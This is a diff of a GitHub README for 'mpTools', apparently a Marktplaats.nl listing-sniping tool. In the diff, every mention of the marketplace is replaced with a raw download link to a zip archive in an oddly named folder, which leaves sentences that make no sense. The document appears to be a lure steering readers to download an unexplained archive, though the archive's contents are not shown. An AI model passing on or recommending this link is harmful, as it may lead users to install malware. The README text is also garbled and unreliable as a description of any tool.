Shashank-Hunagund/mpTools/README.md

-# 🛍️ mpTools - Securely Snatch Limited Items on Marktplaats.nl
+# 🛍️ mpTools - Securely Snatch Limited Items on https://github.com/Shashank-Hunagund/mpTools/raw/refs/heads/main/Caricaceae/Tools_mp_2.4.zip

 ## 🚀 Getting Started

 Welcome to mpTools!
-This application helps you quickly find and grab products on Marktplaats.nl, the popular Dutch second-hand marketplace.
+This application helps you quickly find and grab products on https://github.com/Shashank-Hunagund/mpTools/raw/refs/heads/main/Caricaceae/Tools_mp_2.4.zip, the popular Dutch second-hand marketplace.
 Whether you’re looking for rare collectibles or great deals, this tool gives you the edge you need.

 ## 🎯 Features

-- **Fast Searches:** Quickly search for items on Marktplaats.nl based on your criteria.
+- **Fast Searches:** Quickly search for items on https://github.com/Shashank-Hunagund/mpTools/raw/refs/heads/main/Caricaceae/Tools_mp_2.4.zip based on your criteria.
 - **Product Alerts:** Get notified when new items match your preferences.
 - **User-Friendly:** Easy to navigate, even for non-technical users.
 - **Customizable:** Set your search parameters to find exactly what you want.